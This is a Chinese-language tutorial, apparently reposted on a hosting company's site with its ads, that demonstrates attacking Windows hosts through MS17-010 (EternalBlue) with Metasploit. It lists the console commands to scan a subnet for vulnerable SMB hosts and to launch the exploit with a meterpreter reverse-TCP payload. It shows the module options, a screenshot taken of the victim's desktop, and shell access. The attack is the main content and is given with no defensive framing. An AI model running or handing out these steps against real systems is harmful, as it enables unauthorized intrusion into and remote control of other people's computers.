使用MSF对MS17-010的利用演示-创新互联

过程:

成都创新互联公司专注于企业成都全网营销、网站重做改版、金沙网站定制设计、自适应品牌网站建设、H5页面制作电子商务商城网站建设、集团公司官网建设、成都外贸网站建设、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为金沙等各大城市提供网站开发制作服务。

    1、扫描: 信息搜集(刺探)


    2、漏洞利用


一、首先检测网段内存在漏洞的主机系统:

使用命令:


msf > use auxiliary/scanner/smb/smb_ms17_010        //加载扫描exp
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24    //配置扫描网段
msf auxiliary(scanner/smb/smb_ms17_010) > run        //进行扫描

结果如下:

使用MSF对MS17-010的利用演示

二、漏洞利用

msf利用命令如下:

msf > use exploit/windows/smb/ms17_010_eternalblue          //加载***模块
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25      //配置***目标IP
RHOSTS => 192.168.22.25
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146        //配置本机IP
LHOST => 192.168.5.146
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp     //配置回链方式
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) >

查看当前配置的payload

msf exploit(windows/smb/ms17_010_eternalblue) > show options    //查看配置选项

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.22.25    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.5.146    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) >

发起***:

***命令: 
msf exploit(windows/smb/ms17_010_eternalblue) > exploit        //发起***

使用MSF对MS17-010的利用演示

获取对方电脑桌面:

meterpreter > screenshot
Screenshot saved to: /root/RBDEvfGv.jpeg    //可以到root目录下 查看对方电脑的截屏

获取shel权限

使用MSF对MS17-010的利用演示

有关更多获取权限后的***技巧, 请自行百度  msf 后*** ***模块

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


网站栏目:使用MSF对MS17-010的利用演示-创新互联
浏览地址:http://pwwzsj.com/article/dodiji.html